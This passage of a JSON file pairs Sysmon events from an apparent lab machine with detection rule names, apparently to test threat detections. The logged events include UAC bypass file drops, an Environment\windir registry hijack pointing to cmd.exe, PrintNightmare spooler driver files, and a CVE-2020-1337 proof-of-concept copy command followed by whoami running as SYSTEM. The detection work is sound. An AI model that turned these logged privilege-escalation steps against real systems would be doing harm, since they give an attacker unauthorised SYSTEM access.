12:31:14.985","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-7E92-5D45-0000-0010FF472601","ProcessId":4884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\GdiPlus.dll","UtcTime":"2019-08-03 12:31:14.986"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5487,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:31:15.096244Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Using Consent and Comctl32 - File","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 12:08:13.721","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-792D-5D45-0000-00104F190601","ProcessId":5336,"RuleName":"PrivEsc - UAC Bypass UACME 22","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\comctl32.dll","UtcTime":"2019-08-03 12:08:13.721"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5438,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:08:13.818381Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Old","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342291,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.551382Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342292,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.551399Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRV.DLL","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342293,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.551413Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRVUI.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342294,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562442Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.GPD","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342295,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562798Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRV.HLP","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342296,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562856Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYRES.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342297,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562922Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.INI","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342298,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562970Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342299,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563018Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYUI.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342300,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563107Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYUI.HLP","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342301,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563213Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIRES.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342302,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563647Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDNAMES.GPD","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342303,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.602658Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDDTYPE.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342304,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.602986Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDSCHEM.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342305,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.603171Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDSCHMX.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342306,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.603794Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Old\\1","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342307,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.622837Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /c copy Report.wer C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\a_b_c_d_e > nul 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Public\\tools\\PrivEsc\\cve-2020-1337-poc-master\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-E911-5F33-0000-0020241C0400","LogonId":"0x41c24","OriginalFileName":"Cmd.Exe","ParentCommandLine":"WerTrigger.exe","ParentImage":"C:\\Users\\Public\\tools\\PrivEsc\\cve-2020-1337-poc-master\\WerTrigger.exe","ParentProcessGuid":"747F3D96-E938-5F33-0000-00109CA00E00","ParentProcessId":7820,"ProcessGuid":"747F3D96-E93A-5F33-0000-001014B30E00","ProcessId":7868,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-08-12 13:06:02.548"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":342413,"Execution_attributes":{"ProcessID":3344,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:06:02.552084Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-E909-5F33-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-E93C-5F33-0000-0010A6F00E00","ParentProcessId":8032,"ProcessGuid":"747F3D96-E940-5F33-0000-001039310F00","ProcessId":7460,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-12 13:06:08.141"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":342417,"Execution_attributes":{"ProcessID":3344,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:06:08.143703Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6ABB-5EAD-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"powershell.exe","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-B592-5EAD-0000-0010D4CDC200","ParentProcessId":1428,"ProcessGuid":"747F3D96-B595-5EAD-0000-00106BFDC200","ProcessId":6004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-02 18:01:57.417"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":110435,"Execution_attributes":{"ProcessID":3068,"ThreadID":2232},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-02T18:01:57.418442Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\windows\\system32\\cmd.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 (WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"\"C:\\Windows\\System32\\mmc.exe\" WF.msc","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"00247C92-9E03-5F7B-0000-0010A645272C","ParentProcessId":20228,"ProcessGuid":"00247C92-9E04-5F7B-0000-0010CF98272C","ProcessId":12876,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 22:28:20.529"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164913,"Execution_attributes":{"ProcessID":5424,"ThreadID":6708},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-05T22:28:20.530062Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\"C:\\Windows\\system32\\cmd.exe\"","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5808-5D45-0000-00106CDC3E00","ProcessId":924,"RuleName":"PrivEsc - UAC bypass UACME-34","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir","UtcTime":"2019-08-03 09:46:48.692"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5132,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-03T09:46:48.726304Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult 